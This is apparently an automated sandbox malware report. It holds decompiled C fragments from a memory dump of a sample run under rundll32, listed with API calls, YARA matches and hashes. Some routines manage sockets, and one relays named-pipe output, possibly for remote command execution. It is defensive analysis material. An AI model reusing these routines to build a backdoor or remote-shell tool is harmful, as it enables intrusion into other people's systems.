                                                                                              				_t26 = 0xff;
                                                                                              				_a8 = 0xff;
                                                                                              				if(_t51 != 0 &&  *((intOrPtr*)(_t51 + 0x30)) != 0) {
                                                                                              					_t8 = _t51 + 0x54; // 0x54
                                                                                              					_t56 = _t8;
                                                                                              					EnterCriticalSection(_t56);
                                                                                              					if( *((intOrPtr*)(_t51 + 0x30)) != 0) {
                                                                                              						SetLastError(0);
                                                                                              						_a8 =  *((intOrPtr*)( *_v8 + 0xe8))(_t51,  *((intOrPtr*)(_t39 + 0x20)),  *((intOrPtr*)(_t39 + 0x1c)));
                                                                                              					}
                                                                                              					LeaveCriticalSection(_t56);
                                                                                              					_t26 = _a8;
                                                                                              					_t54 = _v8;
                                                                                              				}
                                                                                              				_a8 = _t26;
                                                                                              				if(_t26 == 0 || _t26 == 1) {
                                                                                              					if(E042756C0(_t39, _t54, _t51, _t51, _t54, _t39,  &_a8) != 0) {
                                                                                              						_t19 = _t51 + 0x84; // 0x84
                                                                                              						E0426EC90(_t19);
                                                                                              						_t54 = _v8;
                                                                                              						 *(_t51 + 0x50) = 0;
                                                                                              						 *(_t51 + 0x84) = 0;
                                                                                              						E04273AC0(_t39, _v8, _t51, _v8, _t51, _t39);
                                                                                              					}
                                                                                              					_t26 = _a8;
                                                                                              				}
                                                                                              				if(_t26 == 0xff) {
                                                                                              					L15:
                                                                                              					_t26 = E0426C930(_t54 + 0xb0, _t39);
                                                                                              					if(_t26 == 0) {
                                                                                              						_t26 = HeapFree( *( *(_t39 + 0x14)), 0, _t39);
                                                                                              					}
                                                                                              					goto L17;
                                                                                              				} else {
                                                                                              					if(_t26 != 2) {
                                                                                              						L17:
                                                                                              						return _t26;
                                                                                              					}
                                                                                              					_t31 =  ==  ? 0x4c7 : GetLastError();
                                                                                              					E04272920(_t54, _t51, 2, 4,  ==  ? 0x4c7 : GetLastError());
                                                                                              					goto L15;
                                                                                              				}
                                                                                              			}











                                                                                              0x042738f3
                                                                                              0x042738f6
                                                                                              0x042738f9
                                                                                              0x042738fc
                                                                                              0x04273903
                                                                                              0x0427390b
                                                                                              0x0427390b
                                                                                              0x0427390e
                                                                                              0x04273911
                                                                                              0x04273916
                                                                                              0x0427391b
                                                                                              0x04273923
                                                                                              0x04273923
                                                                                              0x04273927
                                                                                              0x04273931
                                                                                              0x04273935
                                                                                              0x0427394d
                                                                                              0x0427394d
                                                                                              0x04273951
                                                                                              0x04273957
                                                                                              0x0427395a
                                                                                              0x0427395a
                                                                                              0x0427395d
                                                                                              0x04273962
                                                                                              0x0427397c
                                                                                              0x0427397e
                                                                                              0x04273984
                                                                                              0x04273989
                                                                                              0x0427398f
                                                                                              0x04273997
                                                                                              0x042739a1
                                                                                              0x042739a1
                                                                                              0x042739a6
                                                                                              0x042739a6
                                                                                              0x042739ae
                                                                                              0x042739d2
                                                                                              0x042739d9
                                                                                              0x042739e0
                                                                                              0x042739ea
                                                                                              0x042739ea
                                                                                              0x00000000
                                                                                              0x042739b0
                                                                                              0x042739b3
                                                                                              0x042739f0
                                                                                              0x042739f6
                                                                                              0x042739f6
                                                                                              0x042739c2
                                                                                              0x042739cd
                                                                                              0x00000000
                                                                                              0x042739cd

                                                                                              APIs
                                                                                              • timeGetTime.WINMM(?,?,?,?,?,0427375E,?,00000000,?,?,?,00000000,?,04273568,?,?), ref: 04273905
                                                                                              • RtlEnterCriticalSection.NTDLL(00000054), ref: 04273927
                                                                                              • SetLastError.KERNEL32(00000000,?,0427375E,?,00000000,?,?,?,00000000,?,04273568,?,?,?,?,00000000), ref: 04273935
                                                                                              • RtlLeaveCriticalSection.NTDLL(00000054), ref: 04273951
                                                                                              • GetLastError.KERNEL32 ref: 042739B5
                                                                                              • HeapFree.KERNEL32(?,00000000,?,?), ref: 042739EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalErrorLastSection$EnterFreeHeapLeaveTimetime
                                                                                              • String ID:
                                                                                              • API String ID: 340097737-0
                                                                                              • Opcode ID: 27ad657be7f149748c3545db7f890fe0a8444d364cf00860f91a495dcb242a4c
                                                                                              • Instruction ID: d47dc35f3b889d013de8882f8a7affcc24fd97d692da3585af55e06bb99cb894
                                                                                              • Opcode Fuzzy Hash: 27ad657be7f149748c3545db7f890fe0a8444d364cf00860f91a495dcb242a4c
                                                                                              • Instruction Fuzzy Hash: B931AE71710206EBEB24DF69D888BAAB7A8FF44314F108029ED09D7681DB34FD51DB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 52%
                                                                                              			E04257AC0(void* _a4) {
                                                                                              				intOrPtr _v0;
                                                                                              				intOrPtr _v4;
                                                                                              				long _t33;
                                                                                              				struct _CRITICAL_SECTION* _t39;
                                                                                              				void* _t41;
                                                                                              				void* _t43;
                                                                                              
                                                                                              				_t16 =  ==  ? 0xc0000017 : 0xc000001d;
                                                                                              				RaiseException( ==  ? 0xc0000017 : 0xc000001d, 1, 0, 0);
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				asm("int3");
                                                                                              				_t43 = _t41;
                                                                                              				_push(_t43);
                                                                                              				if(_v0 == 0 || _v0 <= 0) {
                                                                                              					_t33 = 0x57;
                                                                                              					SetLastError(0x57);
                                                                                              					goto L12;
                                                                                              				} else {
                                                                                              					if( *((intOrPtr*)( *0xc0000017 + 0x40))() == 0) {
                                                                                              						SetLastError(0x139f);
                                                                                              						return 0xbadbad;
                                                                                              					} else {
                                                                                              						_t39 = 0xffffffffc0000163;
                                                                                              						EnterCriticalSection(0xffffffffc0000163);
                                                                                              						if( *((intOrPtr*)( *0xc0000017 + 0x40))() == 0) {
                                                                                              							_t33 = 0x139f;
                                                                                              						} else {
                                                                                              							_t33 = E0426FAD0(0xc0000017, _v4, _v0);
                                                                                              						}
                                                                                              						LeaveCriticalSection(_t39);
                                                                                              						if(_t33 == 0) {
                                                                                              							L12:
                                                                                              							return 0 | _t33 == 0x00000000;
                                                                                              						} else {
                                                                                              							SetLastError(_t33);
                                                                                              							return 0 | _t33 == 0x00000000;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}









                                                                                              0x04257ada
                                                                                              0x04257ade
                                                                                              0x04257ae4
                                                                                              0x04257ae5
                                                                                              0x04257ae6
                                                                                              0x04257ae7
                                                                                              0x04257ae8
                                                                                              0x04257ae9
                                                                                              0x04257aea
                                                                                              0x04257aeb
                                                                                              0x04257aec
                                                                                              0x04257aed
                                                                                              0x04257aee
                                                                                              0x04257aef
                                                                                              0x04257af3
                                                                                              0x0426fa30
                                                                                              0x0426fa3a
                                                                                              0x0426fab1
                                                                                              0x0426fab7
                                                                                              0x00000000
                                                                                              0x0426fa42
                                                                                              0x0426fa49
                                                                                              0x0426fa9f
                                                                                              0x0426faae
                                                                                              0x0426fa4b
                                                                                              0x0426fa4c
                                                                                              0x0426fa53
                                                                                              0x0426fa62
                                                                                              0x0426fa75
                                                                                              0x0426fa64
                                                                                              0x0426fa71
                                                                                              0x0426fa71
                                                                                              0x0426fa7b
                                                                                              0x0426fa84
                                                                                              0x0426fabd
                                                                                              0x0426fac6
                                                                                              0x0426fa86
                                                                                              0x0426fa87
                                                                                              0x0426fa96
                                                                                              0x0426fa96
                                                                                              0x0426fa84
                                                                                              0x0426fa49

                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,042583DB,80004005,?,042587F8,04258B6E,00000000,?), ref: 04257ADE
                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 0426FA53
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0426FA7B
                                                                                              • SetLastError.KERNEL32(0000139F,?,042583DB,80004005,?,042587F8,04258B6E,00000000,?), ref: 0426FA87
                                                                                                • Part of subcall function 0426FAD0: SetEvent.KERNEL32(?,?,?,?,?,0426FA71,00000000,00000000,?,?,042583DB,80004005,?,042587F8,04258B6E,00000000), ref: 0426FB2C
                                                                                              • SetLastError.KERNEL32(0000139F,?,?,042583DB,80004005,?,042587F8,04258B6E,00000000,?), ref: 0426FA9F
                                                                                              • SetLastError.KERNEL32(00000057,74D0F5E0,?,?,042583DB,80004005,?,042587F8,04258B6E,00000000,?), ref: 0426FAB7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CriticalSection$EnterEventExceptionLeaveRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3848672818-0
                                                                                              • Opcode ID: 30458ad5e6a90ea2d598b56e0fca507c12d05852bc8ea69a477a9f094586cd86
                                                                                              • Instruction ID: 17ce013977147fa1f57d03c2964fb5936ab8532d4c668f51f8bf579138ded015
                                                                                              • Opcode Fuzzy Hash: 30458ad5e6a90ea2d598b56e0fca507c12d05852bc8ea69a477a9f094586cd86
                                                                                              • Instruction Fuzzy Hash: CC11DA36324205ABDB045668F90CBBA7B6DDFC4751F12C025F90ADB244DF79DC9296A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 79%
                                                                                              			E04273800(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a8, void* _a12) {
                                                                                              				signed int _v8;
                                                                                              				long _v12;
                                                                                              				intOrPtr* _v16;
                                                                                              				void* _v20;
                                                                                              				signed int _t22;
                                                                                              				void* _t26;
                                                                                              				long _t28;
                                                                                              				intOrPtr _t35;
                                                                                              				void* _t47;
                                                                                              				struct _CRITICAL_SECTION* _t50;
                                                                                              				signed int _t52;
                                                                                              
                                                                                              				_t22 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t22 ^ _t52;
                                                                                              				_t35 = _a8;
                                                                                              				_t47 = _a12;
                                                                                              				_v16 = __ecx;
                                                                                              				_v20 = _t47;
                                                                                              				_v12 = 0;
                                                                                              				__imp__#21( *((intOrPtr*)(_t35 + 0x88)), 0xffff, 0x7010,  &_v12, 4);
                                                                                              				_t9 = _t35 + 0x54; // 0x54
                                                                                              				_t50 = _t9;
                                                                                              				 *((intOrPtr*)(_t35 + 0x48)) = 1;
                                                                                              				EnterCriticalSection(_t50);
                                                                                              				if( *((intOrPtr*)(_t35 + 0x30)) != 0) {
                                                                                              					SetLastError(0);
                                                                                              					_t26 =  *((intOrPtr*)( *_v16 + 0xdc))(_t35);
                                                                                              					_t48 = _t26;
                                                                                              					LeaveCriticalSection(_t50);
                                                                                              					if(_t26 == 2) {
                                                                                              						_t47 = _v20;
                                                                                              						goto L5;
                                                                                              					} else {
                                                                                              						E04273AC0(_t35, _v16, _t48, _t50, _t35, _v20);
                                                                                              						return E04275AFE(_v8 ^ _t52);
                                                                                              					}
                                                                                              				} else {
                                                                                              					LeaveCriticalSection(_t50);
                                                                                              					L5:
                                                                                              					E04272920(_v16, _t35, 0, 0, 0);
                                                                                              					_t28 = E0426C930(_v16 + 0xb0, _t47);
                                                                                              					if(_t28 == 0) {
                                                                                              						HeapFree( *( *(_t47 + 0x14)), _t28, _t47);
                                                                                              					}
                                                                                              					return E04275AFE(_v8 ^ _t52);
                                                                                              				}
                                                                                              			}














                                                                                              0x04273806
                                                                                              0x0427380d
                                                                                              0x04273811
                                                                                              0x04273819
                                                                                              0x0427382f
                                                                                              0x04273832
                                                                                              0x04273835
                                                                                              0x0427383c
                                                                                              0x04273842
                                                                                              0x04273842
                                                                                              0x04273845
                                                                                              0x0427384d
                                                                                              0x04273857
                                                                                              0x04273864
                                                                                              0x04273870
                                                                                              0x04273877
                                                                                              0x04273879
                                                                                              0x04273882
                                                                                              0x042738a3
                                                                                              0x00000000
                                                                                              0x04273884
                                                                                              0x0427388b
                                                                                              0x042738a0
                                                                                              0x042738a0
                                                                                              0x04273859
                                                                                              0x0427385a
                                                                                              0x042738a6
                                                                                              0x042738b2
                                                                                              0x042738be
                                                                                              0x042738c5
                                                                                              0x042738ce
                                                                                              0x042738ce
                                                                                              0x042738e4
                                                                                              0x042738e4

                                                                                              APIs
                                                                                              • setsockopt.WS2_32(?,0000FFFF,00007010,?,00000004), ref: 0427383C
                                                                                              • RtlEnterCriticalSection.NTDLL(00000054), ref: 0427384D
                                                                                              • RtlLeaveCriticalSection.NTDLL(00000054), ref: 0427385A
                                                                                                • Part of subcall function 04272920: RtlEnterCriticalSection.NTDLL(00000054), ref: 04272959
                                                                                                • Part of subcall function 04272920: RtlEnterCriticalSection.NTDLL(-0000006C), ref: 0427295F
                                                                                              • SetLastError.KERNEL32(00000000), ref: 04273864
                                                                                              • RtlLeaveCriticalSection.NTDLL(00000054), ref: 04273879
                                                                                              • HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 042738CE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Enter$Leave$ErrorFreeHeapLastsetsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 773220702-0
                                                                                              • Opcode ID: d6ad879191e4c665fd157678272e488b266003602c084b741d8473d61dd9dd93
                                                                                              • Instruction ID: 28af7a04c50f73c9f2b8f04a721b76b9cdd667e5273e9ada85e4bfa5217ab196
                                                                                              • Opcode Fuzzy Hash: d6ad879191e4c665fd157678272e488b266003602c084b741d8473d61dd9dd93
                                                                                              • Instruction Fuzzy Hash: 84219431B10209EBDB14EFA8EC88FAEB7B8FF44310F104069E906A7281CB746D44DB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 80%
                                                                                              			E04264000(intOrPtr _a4) {
                                                                                              				signed int _v8;
                                                                                              				void _v1036;
                                                                                              				void _v1037;
                                                                                              				void* _v1040;
                                                                                              				intOrPtr _v1044;
                                                                                              				intOrPtr _v1056;
                                                                                              				char _v1060;
                                                                                              				intOrPtr _v1061;
                                                                                              				long _v1064;
                                                                                              				long _v1065;
                                                                                              				long _v1068;
                                                                                              				long _v1069;
                                                                                              				signed int _t26;
                                                                                              				void* _t48;
                                                                                              				void* _t55;
                                                                                              				intOrPtr _t57;
                                                                                              				signed int _t58;
                                                                                              
                                                                                              				_t26 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t26 ^ (_t58 & 0xfffffff8) - 0x0000042c;
                                                                                              				_t48 = PeekNamedPipe;
                                                                                              				_t57 = _a4;
                                                                                              				_v1068 = 0;
                                                                                              				while(1) {
                                                                                              					L1:
                                                                                              					Sleep(0x64);
                                                                                              					if(PeekNamedPipe( *(_t57 + 0xc),  &_v1036, 0x400,  &_v1068,  &_v1064, 0) == 0) {
                                                                                              						continue;
                                                                                              					}
                                                                                              					L2:
                                                                                              					while(_v1068 > 0) {
                                                                                              						_t55 = LocalAlloc(0x40, _v1064);
                                                                                              						ReadFile( *(_t57 + 0xc), _t55, _v1064,  &_v1068, 0);
                                                                                              						_t53 = _t55;
                                                                                              						E04266470(_t48,  &_v1060, _t55, _t55, _t57, _v1068);
                                                                                              						_t51 =  >=  ? _v1060 :  &_v1060;
                                                                                              						_push(0x3f);
                                                                                              						_push(_v1044 + _v1044);
                                                                                              						_push( >=  ? _v1060 :  &_v1060);
                                                                                              						E04251C60( *((intOrPtr*)(_t57 + 4)));
                                                                                              						LocalFree(_t55);
                                                                                              						_t40 = _v1056;
                                                                                              						if(_v1056 >= 8) {
                                                                                              							E04253540(_t48, _t53, _t55, _v1061, _t40 + 1);
                                                                                              						}
                                                                                              						if(PeekNamedPipe( *(_t57 + 0xc),  &_v1037, 0x400,  &_v1069,  &_v1065, 0) != 0) {
                                                                                              							continue;
                                                                                              						} else {
                                                                                              							while(1) {
                                                                                              								L1:
                                                                                              								Sleep(0x64);
                                                                                              								if(PeekNamedPipe( *(_t57 + 0xc),  &_v1036, 0x400,  &_v1068,  &_v1064, 0) == 0) {
                                                                                              									continue;
                                                                                              								}
                                                                                              								goto L2;
                                                                                              								do {
                                                                                              									goto L1;
                                                                                              								} while (PeekNamedPipe( *(_t57 + 0xc),  &_v1036, 0x400,  &_v1068,  &_v1064, 0) == 0);
                                                                                              								goto L2;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					L1:
                                                                                              					Sleep(0x64);
                                                                                              				}
                                                                                              			}




















                                                                                              0x0426400c
                                                                                              0x04264013
                                                                                              0x0426401b
                                                                                              0x04264022
                                                                                              0x04264026
                                                                                              0x04264030
                                                                                              0x04264030
                                                                                              0x04264032
                                                                                              0x04264055
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04264057
                                                                                              0x0426406c
                                                                                              0x0426407b
                                                                                              0x04264085
                                                                                              0x0426408b
                                                                                              0x0426409d
                                                                                              0x042640a4
                                                                                              0x042640a6
                                                                                              0x042640a7
                                                                                              0x042640ab
                                                                                              0x042640b1
                                                                                              0x042640b7
                                                                                              0x042640be
                                                                                              0x042640c6
                                                                                              0x042640c6
                                                                                              0x042640e8
                                                                                              0x00000000
                                                                                              0x042640ee
                                                                                              0x04264030
                                                                                              0x04264030
                                                                                              0x04264032
                                                                                              0x04264055
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04264030
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04264030
                                                                                              0x04264030
                                                                                              0x042640e8
                                                                                              0x04264030
                                                                                              0x04264032
                                                                                              0x04264053

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000064), ref: 04264032
                                                                                              • PeekNamedPipe.KERNEL32(?,?,00000400,?,?,00000000), ref: 04264051
                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 04264064
                                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0426407B
                                                                                              • LocalFree.KERNEL32(00000000,?,?,0000003F,?,?,?,?,?,?,?,00000000), ref: 042640B1
                                                                                              • PeekNamedPipe.KERNEL32(?,?,00000400,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 042640E4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LocalNamedPeekPipe$AllocFileFreeReadSleep
                                                                                              • String ID:
                                                                                              • API String ID: 2866027955-0
                                                                                              • Opcode ID: 59d46a39d0bff5cae307e8b54febc17d110d1b2591881a9b52191e0678a941df
                                                                                              • Instruction ID: 9b7de016a37c133be25d0bef3ac46629f056e4cf25731b68cfc4409273544177
                                                                                              • Opcode Fuzzy Hash: 59d46a39d0bff5cae307e8b54febc17d110d1b2591881a9b52191e0678a941df
                                                                                              • Instruction Fuzzy Hash: 84210A72218302AFD714EF64EC44F6BB7ECEB88704F104919FA91C2191DB70E949CB66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAEventSelect.WS2_32(?,?,00000023), ref: 0426E2E8
                                                                                              • WSAGetLastError.WS2_32(?,0426E1F3,00000010), ref: 0426E2F3
                                                                                              • SetLastError.KERNEL32(00000000,?,0426E1F3,00000010), ref: 0426E328
                                                                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 0426E343
                                                                                              • WSAGetLastError.WS2_32(?,0426E1F3,00000010), ref: 0426E34E
                                                                                              • GetLastError.KERNEL32(?,0426E1F3,00000010), ref: 0426E369
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EventSelectsend
                                                                                              • String ID:
                                                                                              • API String ID: 259408233-0
                                                                                              • Opcode ID: f2ac32df309d738e48af68e7e372e6b79e68b8733509bddad930497a1336f9fb
                                                                                              • Instruction ID: 5d881ab70aa7c9b3c2fc2b9e7861607e77d75dc0405f233da6d3758b493535c6
                                                                                              • Opcode Fuzzy Hash: f2ac32df309d738e48af68e7e372e6b79e68b8733509bddad930497a1336f9fb
                                                                                              • Instruction Fuzzy Hash: 8C216DB53147009FE7309FA8E80CB56BBF5EB04315F204A2DE65AC66D0C7B9E9548F94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 18%
                                                                                              			E0426E6F0(intOrPtr* __ecx) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				intOrPtr _t29;
                                                                                              				intOrPtr _t30;
                                                                                              				long _t36;
                                                                                              				intOrPtr* _t45;
                                                                                              
                                                                                              				_t45 = __ecx;
                                                                                              				_t36 = GetCurrentThreadId();
                                                                                              				if( *((intOrPtr*)(_t45 + 0x50)) == 3) {
                                                                                              					L14:
                                                                                              					 *((intOrPtr*)(_t45 + 0x48)) = 1;
                                                                                              					SetLastError(0x139f);
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					E0426EC90(_t45 + 0x148);
                                                                                              					if( *((intOrPtr*)( *_t45 + 0x24))() == 0) {
                                                                                              						 *((intOrPtr*)(_t45 + 0x148)) = 0;
                                                                                              						goto L14;
                                                                                              					} else {
                                                                                              						 *((intOrPtr*)(_t45 + 0x50)) = 2;
                                                                                              						_push(_t36);
                                                                                              						 *((intOrPtr*)(_t45 + 0x148)) = 0;
                                                                                              						E0426E8C0(_t36, _t45, _t45);
                                                                                              						if( *((intOrPtr*)( *_t45 + 0x40))() != 0) {
                                                                                              							if( *((intOrPtr*)(_t45 + 0x18)) != 0) {
                                                                                              								__imp__#19( *((intOrPtr*)(_t45 + 0x1c)), 0x429f78c, 0x10, 0);
                                                                                              							}
                                                                                              							 *((intOrPtr*)(_t45 + 0x4c)) = 0;
                                                                                              						}
                                                                                              						if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                                                                              							 *((intOrPtr*)( *_t45 + 0x90))( *((intOrPtr*)(_t45 + 0x10)),  *((intOrPtr*)(_t45 + 0x14)));
                                                                                              						}
                                                                                              						_t29 =  *((intOrPtr*)(_t45 + 0x20));
                                                                                              						if(_t29 != 0) {
                                                                                              							__imp__WSACloseEvent(_t29);
                                                                                              							 *((intOrPtr*)(_t45 + 0x20)) = 0;
                                                                                              						}
                                                                                              						_t30 =  *((intOrPtr*)(_t45 + 0x1c));
                                                                                              						if(_t30 != 0xffffffff) {
                                                                                              							__imp__#22(_t30, 1);
                                                                                              							__imp__#3( *((intOrPtr*)(_t45 + 0x1c)));
                                                                                              							 *((intOrPtr*)(_t45 + 0x1c)) = 0xffffffff;
                                                                                              						}
                                                                                              						 *((intOrPtr*)( *_t45 + 0xb8))();
                                                                                              						return 1;
                                                                                              					}
                                                                                              				}
                                                                                              			}









                                                                                              0x0426e6f3
                                                                                              0x0426e6ff
                                                                                              0x0426e701
                                                                                              0x0426e7cd
                                                                                              0x0426e7d2
                                                                                              0x0426e7d9
                                                                                              0x0426e7e4
                                                                                              0x0426e707
                                                                                              0x0426e70d
                                                                                              0x0426e71b
                                                                                              0x0426e7c3
                                                                                              0x00000000
                                                                                              0x0426e721
                                                                                              0x0426e721
                                                                                              0x0426e72a
                                                                                              0x0426e72b
                                                                                              0x0426e735
                                                                                              0x0426e743
                                                                                              0x0426e749
                                                                                              0x0426e757
                                                                                              0x0426e757
                                                                                              0x0426e75d
                                                                                              0x0426e75d
                                                                                              0x0426e768
                                                                                              0x0426e774
                                                                                              0x0426e774
                                                                                              0x0426e77a
                                                                                              0x0426e77f
                                                                                              0x0426e782
                                                                                              0x0426e788
                                                                                              0x0426e788
                                                                                              0x0426e78f
                                                                                              0x0426e795
                                                                                              0x0426e79a
                                                                                              0x0426e7a3
                                                                                              0x0426e7a9
                                                                                              0x0426e7a9
                                                                                              0x0426e7b4
                                                                                              0x0426e7c2
                                                                                              0x0426e7c2
                                                                                              0x0426e71b

                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0426E6F5
                                                                                              • SetLastError.KERNEL32(0000139F,?,00000000,04258425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,042587F8,04258B6E,00000000,?), ref: 0426E7D9
                                                                                                • Part of subcall function 0426EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0426ECA5
                                                                                                • Part of subcall function 0426EC90: SwitchToThread.KERNEL32(?,?,00000000,0426E712,?,00000000,04258425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,042587F8), ref: 0426ECBD
                                                                                                • Part of subcall function 0426E8C0: SetEvent.KERNEL32(?,?,04258B6E,0429E024,?), ref: 0426E8E7
                                                                                                • Part of subcall function 0426E8C0: CloseHandle.KERNEL32(00000000,?,04258B6E,0429E024,?), ref: 0426E90A
                                                                                              • send.WS2_32(?,0429F78C,00000010,00000000), ref: 0426E757
                                                                                              • WSACloseEvent.WS2_32(00000000), ref: 0426E782
                                                                                              • shutdown.WS2_32(?,00000001), ref: 0426E79A
                                                                                              • closesocket.WS2_32(?), ref: 0426E7A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEventThread$CompareCurrentErrorExchangeHandleInterlockedLastSwitchclosesocketsendshutdown
                                                                                              • String ID:
                                                                                              • API String ID: 4222243704-0
                                                                                              • Opcode ID: a5059b06a12cb9b3c3cf5dabdc9eab52fd4fd98f3583b72e76b6cef280456d7a
                                                                                              • Instruction ID: d314ba695cc3ee15aac48a287a0b208ffcfbc9fef3a5df411a597481f75de57e
                                                                                              • Opcode Fuzzy Hash: a5059b06a12cb9b3c3cf5dabdc9eab52fd4fd98f3583b72e76b6cef280456d7a
                                                                                              • Instruction Fuzzy Hash: D2217A74310602ABD725AF29D88CBA9BBA6FF54315F110258E116876D0CBB5F8A1CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 94%
                                                                                              			E04272150(intOrPtr* __ecx, intOrPtr _a4, void* _a8) {
                                                                                              				intOrPtr* _v8;
                                                                                              				long _t25;
                                                                                              				void* _t36;
                                                                                              				intOrPtr _t39;
                                                                                              				void* _t45;
                                                                                              				intOrPtr* _t48;
                                                                                              				struct _CRITICAL_SECTION* _t51;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_t48 = __ecx;
                                                                                              				_t36 = 0xff;
                                                                                              				_t45 = _a8;
                                                                                              				_v8 = __ecx;
                                                                                              				if( *((intOrPtr*)(__ecx + 0xc)) != 0) {
                                                                                              					_t39 = _a4;
                                                                                              					if(_t39 != 0 &&  *((intOrPtr*)(_t39 + 0x30)) != 0) {
                                                                                              						_t29 =  ==  ? 0x6c : 0x54;
                                                                                              						_t51 = ( ==  ? 0x6c : 0x54) + _t39;
                                                                                              						EnterCriticalSection(_t51);
                                                                                              						if( *((intOrPtr*)(_a4 + 0x30)) != 0) {
                                                                                              							SetLastError(0);
                                                                                              							_t36 =  *((intOrPtr*)( *_v8 + 0xec))(_a4,  *((intOrPtr*)(_t45 + 0x20)),  *((intOrPtr*)(_t45 + 0x1c)));
                                                                                              						}
                                                                                              						LeaveCriticalSection(_t51);
                                                                                              						_t48 = _v8;
                                                                                              					}
                                                                                              				} else {
                                                                                              					SetLastError(0);
                                                                                              					_t36 =  *((intOrPtr*)( *_t48 + 0xec))(_a4,  *((intOrPtr*)(_t45 + 0x20)),  *((intOrPtr*)(_t45 + 0x1c)));
                                                                                              				}
                                                                                              				_t19 = _t45 + 0x28; // 0x28
                                                                                              				if(InterlockedDecrement(_t19) == 0) {
                                                                                              					_t25 = E0426C930(_t48 + 0xb0, _t45);
